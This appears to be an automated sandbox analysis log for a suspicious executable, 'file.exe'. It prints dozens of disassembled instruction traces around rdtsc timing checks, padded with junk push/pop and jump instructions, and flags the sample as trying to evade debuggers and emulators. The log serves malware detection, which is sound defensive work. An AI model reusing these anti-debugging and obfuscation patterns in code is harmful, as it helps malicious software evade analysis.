Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0661 second address: 50C06C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5A147D6A2Fh 0x00000008 mov ch, 56h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebp 0x0000000e jmp 00007F5A147D6A30h 0x00000013 mov dword ptr [esp], ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F5A147D6A2Eh 0x0000001d sbb cx, 6228h 0x00000022 jmp 00007F5A147D6A2Bh 0x00000027 popfd 0x00000028 mov ecx, 713A7B1Fh 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F5A147D6A2Ch 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C06C5 second address: 50C06C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C06C9 second address: 50C06CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0763 second address: 50A077C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 mov bx, 730Eh 0x0000000d mov esi, edx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov dh, al 0x00000016 mov al, bl 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A077C second address: 50A0799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0799 second address: 50A079D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A079D second address: 50A07B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C01D4 second address: 50C01D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C01D8 second address: 50C01EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C01EB second address: 50C0200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5A14B6C83Fh 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0200 second address: 50C020E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C020E second address: 50C0212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0212 second address: 50C0223 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0223 second address: 50C0241 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 movzx eax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5A14B6C83Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0241 second address: 50C0245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0245 second address: 50C024B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C024B second address: 50C0265 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov esi, ebx 0x00000010 push edx 0x00000011 pop ecx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0265 second address: 50C026A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C049F second address: 50C0536 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5A147D6A2Fh 0x00000009 or esi, 681DE58Eh 0x0000000f jmp 00007F5A147D6A39h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F5A147D6A30h 0x0000001b jmp 00007F5A147D6A35h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F5A147D6A33h 0x0000002e add cx, E8FEh 0x00000033 jmp 00007F5A147D6A39h 0x00000038 popfd 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E08CB second address: 50E08F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C83Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F5A14B6C840h 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E08F2 second address: 50E08F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E08F8 second address: 50E0960 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C83Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5A14B6C846h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov bl, cl 0x00000014 mov eax, edx 0x00000016 popad 0x00000017 push esi 0x00000018 jmp 00007F5A14B6C842h 0x0000001d mov dword ptr [esp], ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov esi, edi 0x00000025 call 00007F5A14B6C849h 0x0000002a pop eax 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0960 second address: 50E0966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0966 second address: 50E096A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E096A second address: 50E097D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [775165FCh] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E097D second address: 50E0981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0981 second address: 50E0987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0987 second address: 50E09B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 mov ecx, 08AFCDF1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test eax, eax 0x0000000f pushad 0x00000010 mov dl, cl 0x00000012 movsx edx, cx 0x00000015 popad 0x00000016 je 00007F5A86F1F7FFh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov edx, 57C9725Eh 0x00000024 mov edi, 2CB6566Ah 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E09B1 second address: 50E09CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A147D6A37h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E09CC second address: 50E09D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E09D0 second address: 50E09E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E09E1 second address: 50E09E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E09E6 second address: 50E09FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A147D6A34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E09FE second address: 50E0A8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C83Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, dword ptr [ebp+08h] 0x0000000e jmp 00007F5A14B6C83Fh 0x00000013 and ecx, 1Fh 0x00000016 jmp 00007F5A14B6C846h 0x0000001b ror eax, cl 0x0000001d pushad 0x0000001e mov dl, ch 0x00000020 mov ax, di 0x00000023 popad 0x00000024 leave 0x00000025 pushad 0x00000026 mov dh, D4h 0x00000028 pushfd 0x00000029 jmp 00007F5A14B6C83Ch 0x0000002e sbb eax, 2CD48CA8h 0x00000034 jmp 00007F5A14B6C83Bh 0x00000039 popfd 0x0000003a popad 0x0000003b retn 0004h 0x0000003e nop 0x0000003f mov esi, eax 0x00000041 lea eax, dword ptr [ebp-08h] 0x00000044 xor esi, dword ptr [00422014h] 0x0000004a push eax 0x0000004b push eax 0x0000004c push eax 0x0000004d lea eax, dword ptr [ebp-10h] 0x00000050 push eax 0x00000051 call 00007F5A1986D2B0h 0x00000056 push FFFFFFFEh 0x00000058 pushad 0x00000059 mov edx, eax 0x0000005b mov bh, al 0x0000005d popad 0x0000005e pop eax 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F5A14B6C846h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0A8B second address: 50E0A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0A91 second address: 50E0ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C83Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ret 0x0000000c nop 0x0000000d push eax 0x0000000e call 00007F5A1986D2E4h 0x00000013 mov edi, edi 0x00000015 pushad 0x00000016 mov edi, esi 0x00000018 jmp 00007F5A14B6C848h 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F5A14B6C847h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0ADD second address: 50E0B40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5A147D6A2Fh 0x00000009 add eax, 35A062BEh 0x0000000f jmp 00007F5A147D6A39h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F5A147D6A30h 0x0000001b sub ax, C3B8h 0x00000020 jmp 00007F5A147D6A2Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov si, 0501h 0x00000031 mov dl, al 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0B40 second address: 50E0B53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A14B6C83Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0B53 second address: 50E0B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0B57 second address: 50E0B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a movsx edi, si 0x0000000d mov ecx, 1C0DCD63h 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0B70 second address: 50E0BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, bx 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007F5A147D6A33h 0x0000000e pushfd 0x0000000f jmp 00007F5A147D6A38h 0x00000014 or esi, 3D03D208h 0x0000001a jmp 00007F5A147D6A2Bh 0x0000001f popfd 0x00000020 popad 0x00000021 popad 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F5A147D6A35h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5090024 second address: 509007B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C849h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5A14B6C83Eh 0x0000000f push eax 0x00000010 jmp 00007F5A14B6C83Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F5A14B6C846h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509007B second address: 509007F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509007F second address: 509009C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C849h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509009C second address: 50900AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A147D6A2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50900AC second address: 509012D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C83Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e pushad 0x0000000f push eax 0x00000010 movsx edi, si 0x00000013 pop eax 0x00000014 movsx edi, ax 0x00000017 popad 0x00000018 xchg eax, ecx 0x00000019 jmp 00007F5A14B6C844h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F5A14B6C83Ch 0x00000028 sbb ecx, 7AFF6EC8h 0x0000002e jmp 00007F5A14B6C83Bh 0x00000033 popfd 0x00000034 pushfd 0x00000035 jmp 00007F5A14B6C848h 0x0000003a adc ax, F128h 0x0000003f jmp 00007F5A14B6C83Bh 0x00000044 popfd 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509012D second address: 5090142 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5A147D6A2Fh 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5090142 second address: 5090165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5A14B6C847h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5090165 second address: 5090182 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5090182 second address: 509019E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C841h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509019E second address: 50901A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50901A2 second address: 50901A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50901A6 second address: 50901AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50901AC second address: 50901E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5A14B6C840h 0x00000008 pop eax 0x00000009 push edi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007F5A14B6C849h 0x00000017 pop ecx 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50901E6 second address: 5090263 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5A147D6A2Eh 0x00000011 sub ch, 00000068h 0x00000014 jmp 00007F5A147D6A2Bh 0x00000019 popfd 0x0000001a call 00007F5A147D6A38h 0x0000001f mov ah, A2h 0x00000021 pop edx 0x00000022 popad 0x00000023 mov ebx, dword ptr [ebp+10h] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 call 00007F5A147D6A2Fh 0x0000002e pop eax 0x0000002f call 00007F5A147D6A39h 0x00000034 pop ecx 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5090263 second address: 5090269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5090269 second address: 509026D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509026D second address: 50902E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F5A14B6C844h 0x0000000e push eax 0x0000000f jmp 00007F5A14B6C83Bh 0x00000014 xchg eax, esi 0x00000015 pushad 0x00000016 mov ecx, 1C02320Bh 0x0000001b mov ebx, esi 0x0000001d popad 0x0000001e mov esi, dword ptr [ebp+08h] 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F5A14B6C848h 0x00000028 xor ecx, 16EAEB48h 0x0000002e jmp 00007F5A14B6C83Bh 0x00000033 popfd 0x00000034 mov esi, 4ACEC2BFh 0x00000039 popad 0x0000003a xchg eax, edi 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F5A14B6C83Ch 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50902E6 second address: 50902F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50902F5 second address: 5090383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C849h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5A14B6C841h 0x0000000f xchg eax, edi 0x00000010 jmp 00007F5A14B6C83Eh 0x00000015 test esi, esi 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F5A14B6C83Eh 0x0000001e or ax, 1598h 0x00000023 jmp 00007F5A14B6C83Bh 0x00000028 popfd 0x00000029 jmp 00007F5A14B6C848h 0x0000002e popad 0x0000002f je 00007F5A86F6AADCh 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F5A14B6C83Ah 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5090383 second address: 5090387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5090387 second address: 509038D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509038D second address: 5090401 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007F5A147D6A30h 0x00000015 je 00007F5A86BD4C9Bh 0x0000001b pushad 0x0000001c mov si, DC5Dh 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F5A147D6A38h 0x00000027 or al, FFFFFFE8h 0x0000002a jmp 00007F5A147D6A2Bh 0x0000002f popfd 0x00000030 mov ebx, ecx 0x00000032 popad 0x00000033 popad 0x00000034 mov edx, dword ptr [esi+44h] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F5A147D6A2Ch 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5090401 second address: 5090410 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C83Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5090410 second address: 509046A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F5A147D6A2Eh 0x00000011 test edx, 61000000h 0x00000017 pushad 0x00000018 call 00007F5A147D6A2Eh 0x0000001d mov ax, 9AA1h 0x00000021 pop ecx 0x00000022 mov ebx, 4F33B752h 0x00000027 popad 0x00000028 jne 00007F5A86BD4C50h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509046A second address: 509046E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509046E second address: 5090474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5090474 second address: 5090490 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A14B6C848h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5090490 second address: 5090494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5090494 second address: 50904AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5A14B6C83Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50904AC second address: 50904D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F5A86BD4C0Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5A147D6A30h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50904D5 second address: 50904E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C83Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50806FA second address: 5080797 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov esi, 00AD4533h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov edx, 240E45FAh 0x00000015 mov dx, C7C6h 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F5A147D6A33h 0x00000022 add ah, 0000004Eh 0x00000025 jmp 00007F5A147D6A39h 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007F5A147D6A30h 0x00000031 jmp 00007F5A147D6A35h 0x00000036 popfd 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a jmp 00007F5A147D6A2Eh 0x0000003f and esp, FFFFFFF8h 0x00000042 jmp 00007F5A147D6A30h 0x00000047 xchg eax, ebx 0x00000048 pushad 0x00000049 push esi 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc

Tries to evade debugger and weak emulator (self modifying code)

